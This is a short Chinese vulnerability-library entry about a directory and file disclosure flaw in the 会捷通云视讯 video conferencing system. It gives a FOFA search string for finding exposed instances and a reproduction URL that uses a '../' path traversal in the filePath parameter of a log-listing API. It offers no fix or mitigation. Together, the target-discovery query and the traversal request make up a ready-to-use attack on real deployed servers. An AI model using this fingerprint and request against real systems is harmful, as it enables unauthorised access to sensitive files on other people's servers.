会捷通云视讯list目录文件泄露漏洞-棉花糖会员站

会捷通云视讯list目录文件泄露漏洞

7月15日发布

010

# 会捷通云视讯list目录文件泄露漏洞

## 漏洞描述

会捷通云视讯某个文件 list参数存在目录文件泄露漏洞，攻击者通过漏洞可以获取一些敏感信息

## 漏洞影响

会捷通云视讯

## FOFA

body=”/him/api/rest/v1.0/node/role”

## 漏洞复现

登陆页面如下

![zc-1](/static/qingy/会捷通云视讯list目录文件泄露漏洞/img/zc-1.png)

访问Url

“`
/him/api/rest/V1.0/system/log/list?filePath=../
“`

![zc-2](/static/qingy/会捷通云视讯list目录文件泄露漏洞/img/zc-2.png)

© 版权声明

文章版权归作者所有，未经允许请勿转载。

THE END

国内漏洞库

喜欢就支持一下吧

相关推荐

评论抢沙发

请登录后发表评论

请登录后查看评论内容